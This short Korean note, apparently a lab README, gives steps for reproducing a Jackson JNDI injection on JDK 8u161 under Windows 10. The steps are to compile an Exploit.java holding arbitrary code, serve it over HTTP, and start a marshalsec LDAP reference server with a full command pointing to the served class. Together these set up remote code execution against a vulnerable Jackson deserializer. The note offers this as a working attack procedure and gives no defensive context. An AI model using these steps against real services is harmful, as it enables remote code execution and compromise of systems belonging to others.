
jackson jndi 인젝션
jdk 8u161
windows10 1903
1. 실행하려는 코드가 포함된 Exploit.java 파일을 생성하고 컴파일하세요
2. 클래스 파일과 같은 디렉터리에서 Python 또는 다른 도구를 사용하여 HTTP 서버를 생성하세요
3. marshalsec을 사용하여 LDAP 서버를 생성하세요: java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit